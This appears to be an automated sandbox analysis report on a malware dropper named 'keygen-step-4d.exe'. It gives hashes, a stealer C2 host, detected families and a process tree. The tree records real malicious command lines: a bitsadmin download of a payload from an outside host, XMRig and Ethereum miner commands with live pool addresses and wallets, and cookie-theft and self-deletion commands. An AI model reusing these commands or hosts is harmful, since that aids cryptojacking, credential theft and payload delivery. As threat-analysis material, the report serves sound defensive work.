Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1800s
  • max time network
    1765s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    25-04-2021 16:03

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 53 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:1004
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2240
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2436
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2704
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2420
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2260
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1880
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1412
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1384
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1184
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1136
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:4064
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:2248
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3800
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1968
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:4508
                        • C:\Users\Admin\AppData\Local\Temp\is-SESC4.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-SESC4.tmp\Install.tmp" /SL5="$6017A,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:4540
                          • C:\Users\Admin\AppData\Local\Temp\is-NG4QU.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-NG4QU.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4628
                            • C:\Program Files\Windows Defender Advanced Threat Protection\BPUUOWFNXO\ultramediaburner.exe
                              "C:\Program Files\Windows Defender Advanced Threat Protection\BPUUOWFNXO\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:4864
                              • C:\Users\Admin\AppData\Local\Temp\is-V8IDQ.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-V8IDQ.tmp\ultramediaburner.tmp" /SL5="$A0050,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\BPUUOWFNXO\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:4900
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4944
                            • C:\Users\Admin\AppData\Local\Temp\8d-05552-c80-768aa-c2b12cd24818e\Calicejeja.exe
                              "C:\Users\Admin\AppData\Local\Temp\8d-05552-c80-768aa-c2b12cd24818e\Calicejeja.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4980
                            • C:\Users\Admin\AppData\Local\Temp\d0-d6bbc-dd1-a2080-8b0a8a763f462\Daelunibole.exe
                              "C:\Users\Admin\AppData\Local\Temp\d0-d6bbc-dd1-a2080-8b0a8a763f462\Daelunibole.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:5032
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wxtp40ct.ly5\instEU.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5944
                                • C:\Users\Admin\AppData\Local\Temp\wxtp40ct.ly5\instEU.exe
                                  C:\Users\Admin\AppData\Local\Temp\wxtp40ct.ly5\instEU.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:6080
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4zw1m3lj.pgx\google-game.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:6132
                                • C:\Users\Admin\AppData\Local\Temp\4zw1m3lj.pgx\google-game.exe
                                  C:\Users\Admin\AppData\Local\Temp\4zw1m3lj.pgx\google-game.exe
                                  7⤵
                                    PID:4808
                                    • C:\Windows\SysWOW64\rundll32.exe
                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                      8⤵
                                        PID:1972
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mn1mu5m1.bgl\md1_1eaf.exe & exit
                                    6⤵
                                      PID:5968
                                      • C:\Users\Admin\AppData\Local\Temp\mn1mu5m1.bgl\md1_1eaf.exe
                                        C:\Users\Admin\AppData\Local\Temp\mn1mu5m1.bgl\md1_1eaf.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Checks whether UAC is enabled
                                        PID:5988
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tjt0fjas.1zk\y1.exe & exit
                                      6⤵
                                        PID:4648
                                        • C:\Users\Admin\AppData\Local\Temp\tjt0fjas.1zk\y1.exe
                                          C:\Users\Admin\AppData\Local\Temp\tjt0fjas.1zk\y1.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:4456
                                          • C:\Users\Admin\AppData\Local\Temp\NfuJ5bU4GI.exe
                                            "C:\Users\Admin\AppData\Local\Temp\NfuJ5bU4GI.exe"
                                            8⤵
                                            • Executes dropped EXE
                                            • Modifies system certificate store
                                            PID:1228
                                            • C:\Users\Admin\AppData\Roaming\1619366504294.exe
                                              "C:\Users\Admin\AppData\Roaming\1619366504294.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619366504294.txt"
                                              9⤵
                                              • Executes dropped EXE
                                              PID:2724
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\NfuJ5bU4GI.exe"
                                              9⤵
                                                PID:5208
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping 127.0.0.1 -n 3
                                                  10⤵
                                                  • Runs ping.exe
                                                  PID:5156
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\tjt0fjas.1zk\y1.exe"
                                              8⤵
                                              • Loads dropped DLL
                                              • Modifies registry class
                                              • Suspicious use of WriteProcessMemory
                                              PID:1972
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /T 10 /NOBREAK
                                                9⤵
                                                • Delays execution with timeout.exe
                                                PID:4296
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ks5qe5wp.zvk\askinstall39.exe & exit
                                          6⤵
                                            PID:2208
                                            • C:\Windows\System32\Conhost.exe
                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              7⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetWindowsHookEx
                                              • Suspicious use of WriteProcessMemory
                                              PID:4808
                                            • C:\Users\Admin\AppData\Local\Temp\ks5qe5wp.zvk\askinstall39.exe
                                              C:\Users\Admin\AppData\Local\Temp\ks5qe5wp.zvk\askinstall39.exe
                                              7⤵
                                                PID:5772
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                  8⤵
                                                    PID:4856
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im chrome.exe
                                                      9⤵
                                                      • Kills process with taskkill
                                                      PID:1404
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3qtdds1y.njd\inst.exe & exit
                                                6⤵
                                                  PID:5684
                                                  • C:\Users\Admin\AppData\Local\Temp\3qtdds1y.njd\inst.exe
                                                    C:\Users\Admin\AppData\Local\Temp\3qtdds1y.njd\inst.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:4408
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vuqf25hm.3pn\SunLabsPlayer.exe /S & exit
                                                  6⤵
                                                    PID:5692
                                                    • C:\Users\Admin\AppData\Local\Temp\vuqf25hm.3pn\SunLabsPlayer.exe
                                                      C:\Users\Admin\AppData\Local\Temp\vuqf25hm.3pn\SunLabsPlayer.exe /S
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Drops file in Program Files directory
                                                      PID:5844
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi9B2E.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:6116
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi9B2E.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:5940
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              9⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Checks SCSI registry key(s)
                                                              • Suspicious behavior: MapViewOfSection
                                                              PID:5772
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi9B2E.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:1760
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi9B2E.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:5400
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi9B2E.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:4292
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi9B2E.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:1940
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi9B2E.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:5576
                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                      "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                      8⤵
                                                                      • Download via BitsAdmin
                                                                      PID:5544
                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pEGKUK1c7rfSb681 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      • Drops file in Program Files directory
                                                                      PID:5408
                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p6WIfVzfuzp7dzK1 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      PID:5368
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi9B2E.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:5016
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi9B2E.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:5604
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi9B2E.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:4144
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi9B2E.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:4256
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi9B2E.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:4896
                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\yZAhtmcTmJGk\yZAhtmcTmJGk.dll" yZAhtmcTmJGk
                                                                                8⤵
                                                                                • Loads dropped DLL
                                                                                PID:4272
                                                                                • C:\Windows\system32\rundll32.exe
                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\yZAhtmcTmJGk\yZAhtmcTmJGk.dll" yZAhtmcTmJGk
                                                                                  9⤵
                                                                                  • Loads dropped DLL
                                                                                  • Drops file in System32 directory
                                                                                  • Drops file in Program Files directory
                                                                                  PID:5284
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi9B2E.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:4916
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi9B2E.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                  • Drops file in Program Files directory
                                                                                  PID:3752
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi9B2E.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:5704
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi9B2E.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:5552
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi9B2E.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:5808
                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        PID:1172
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5dldzlcl.jql\GcleanerWW.exe /mixone & exit
                                                                                    6⤵
                                                                                      PID:5340
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eo5mrcg0.h0x\toolspab1.exe & exit
                                                                                      6⤵
                                                                                        PID:1560
                                                                                        • C:\Users\Admin\AppData\Local\Temp\eo5mrcg0.h0x\toolspab1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\eo5mrcg0.h0x\toolspab1.exe
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:5864
                                                                                          • C:\Users\Admin\AppData\Local\Temp\eo5mrcg0.h0x\toolspab1.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\eo5mrcg0.h0x\toolspab1.exe
                                                                                            8⤵
                                                                                              PID:5772
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4zfcwkd1.y4o\c7ae36fa.exe & exit
                                                                                          6⤵
                                                                                            PID:3172
                                                                                            • C:\Users\Admin\AppData\Local\Temp\4zfcwkd1.y4o\c7ae36fa.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\4zfcwkd1.y4o\c7ae36fa.exe
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Checks SCSI registry key(s)
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:2288
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cibbho4o.bb2\app.exe /8-2222 & exit
                                                                                            6⤵
                                                                                              PID:4488
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:2856
                                                                                              • C:\Users\Admin\AppData\Local\Temp\cibbho4o.bb2\app.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\cibbho4o.bb2\app.exe /8-2222
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4756
                                                                                                • C:\Users\Admin\AppData\Local\Temp\cibbho4o.bb2\app.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\cibbho4o.bb2\app.exe" /8-2222
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:4180
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:6100
                                                                                      • C:\Users\Admin\AppData\Roaming\8C77.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\8C77.tmp.exe"
                                                                                        3⤵
                                                                                          PID:2856
                                                                                          • C:\Users\Admin\AppData\Roaming\8C77.tmp.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\8C77.tmp.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks processor information in registry
                                                                                            PID:5640
                                                                                        • C:\Users\Admin\AppData\Roaming\909E.tmp.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\909E.tmp.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Adds Run key to start application
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:6124
                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                            -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w4169@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                            4⤵
                                                                                              PID:5728
                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                              -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w19750 --cpu-max-threads-hint 50 -r 9999
                                                                                              4⤵
                                                                                              • Blocklisted process makes network request
                                                                                              PID:4664
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                            3⤵
                                                                                              PID:5604
                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                ping 127.0.0.1
                                                                                                4⤵
                                                                                                • Runs ping.exe
                                                                                                PID:4768
                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks whether UAC is enabled
                                                                                            PID:5340
                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            PID:5052
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:1940
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • Modifies system certificate store
                                                                                              PID:4292
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4640
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:1092
                                                                                        • c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                          1⤵
                                                                                          • Drops file in System32 directory
                                                                                          PID:1040
                                                                                          • C:\Users\Admin\AppData\Roaming\htdesbd
                                                                                            C:\Users\Admin\AppData\Roaming\htdesbd
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:2600
                                                                                          • C:\Users\Admin\AppData\Roaming\ubdesbd
                                                                                            C:\Users\Admin\AppData\Roaming\ubdesbd
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:620
                                                                                            • C:\Users\Admin\AppData\Roaming\ubdesbd
                                                                                              C:\Users\Admin\AppData\Roaming\ubdesbd
                                                                                              3⤵
                                                                                              • Executes dropped EXE
